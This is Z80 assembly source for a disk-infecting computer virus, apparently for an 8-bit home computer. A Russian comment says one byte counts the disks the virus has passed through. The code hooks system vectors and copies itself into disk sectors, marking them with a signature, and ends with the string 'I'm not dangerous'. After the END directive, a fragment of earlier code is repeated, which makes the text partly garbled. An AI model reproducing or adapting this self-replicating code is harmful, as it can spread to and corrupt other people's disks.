

	ORG	0DE93H
L00B4	EQU	B4H
L11F5	EQU	11F5H
L1F31	EQU	1F31H
L2AE5	EQU	2AE5H
L5A21	EQU	5A21H
LC02B	EQU	0C02BH
LC02D	EQU	0C02DH
LC02F	EQU	0C02FH
LC09D	EQU	0C09DH
LF270	EQU	0F270H
LF271	EQU	0F271H
LF349	EQU	0F349H
LF34B	EQU	0F34BH
LFF00	EQU	0FF00H
L4010	EQU	4010H
L7405	EQU	7405H
LF2E1	EQU	0F2E1H

db:	0Ch    ;кол-во дисков через которые прошел вирус

	DEC	HL
	PUSH	HL
	LD	HL,(LF349)
	PUSH	HL
	INC	HL
	LD	E,(HL)
	INC	HL
	LD	D,(HL)
	LD	HL,L2AE5
	AND	A
	SBC	HL,DE
	POP	DE
	POP	HL
	JR	Z,LDED4
	LD	BC,LFF00
	EX	DE,HL
	ADD	HL,BC
	LD	(LF349),HL
	LD	(LF34B),HL
	EX	DE,HL
	INC	B
	INC	B
	PUSH	DE
	LDIR
	POP	HL
	PUSH	HL
	LD	DE,L00B4
	ADD	HL,DE
	LD	A,(LF270)
	LD	DE,(LF271)
	LD	(HL),A
	INC	HL
	LD	(HL),E
	INC	HL
	LD	(HL),D
	INC	HL
	LD	(LF271),HL
	LD	A,0C3H
	LD	(LF270),A
LDED4:	
	LD	HL,L1F31
	LD	(LC02B),HL
	LD	HL,L11F5
	LD	(LC02D),HL
	LD	HL,LC09D
	LD	(LC02F),HL
	JP	L5A21
LDEE9:	
	PUSH	BC
	PUSH	DE
	PUSH	IX
	PUSH	HL
	CP	7
	JR	NZ,LDF42
	LD	A,(IX+03H)
	CP	2
	JR	NZ,LDF42
	LD	A,D
	AND	A
	JR	NZ,LDF42
	LD	E,0
	LD	B,1
	LD	C,(IX+01H)
	LD	A,(LF2E1)
	AND	1
	CALL	L4010
	JR	C,LDF42
	POP	HL
	POP	IX
	PUSH	IX
	PUSH	HL
	LD	DE,2BH
	ADD	HL,DE
	LD	A,(HL)
	CP	'*'
	JR	Z,LDF42
	LD	C,2
	LD	B,0
LDF21:	
	LD	(HL),0
	INC	HL
	DJNZ	LDF21
	DEC	C
	JR	NZ,LDF21
	POP	DE
	PUSH	DE
	LD	HL,L7405
	LD	C,0C3H
	LDIR
	EX	DE,HL
	LD	C,'='
	ADD	HL,BC
	EX	DE,HL
	PUSH	DE
	LD	HL,(LF349)
	LD	BC,0100H
	LDIR
	JR	LDF4C
LDF42:	
	POP	HL
	POP	IX
	POP	DE
	POP	BC
	RET
	RET
	RET
	JR	LDEE9
LDF4C:	
	POP	HL
	INC	(HL)
	POP	HL
	PUSH	HL
	LD	C,'+'
	ADD	HL,BC
	LD	(HL),'*'
	INC	HL
	LD	(HL),'Q'
	INC	HL
	LD	(HL),0F3H
	INC	HL
	LD	(HL),'$'
	INC	HL
	LD	(HL),'#'
	INC	HL
	LD	(HL),0E9H
	POP	HL
	PUSH	HL
	LD	D,B
	LD	E,B
	INC	B
	LD	C,(IX+01H)
	LD	A,(LF2E1)
	AND	1
	SCF
	CALL	L4010
	JR	LDF42
	DB	'I''m not dangerous',1DH,11H
	DB	'(''',1FH,1CH,16H,0,0,0
	END
	Z,LDED4
	LD	BC,LFF00
	EX	DE,HL
	ADD	HL,BC
	LD	(LF349),HL
	LD	(LF34B),HL
	EX	DE,HL
	INC	B
	INC	B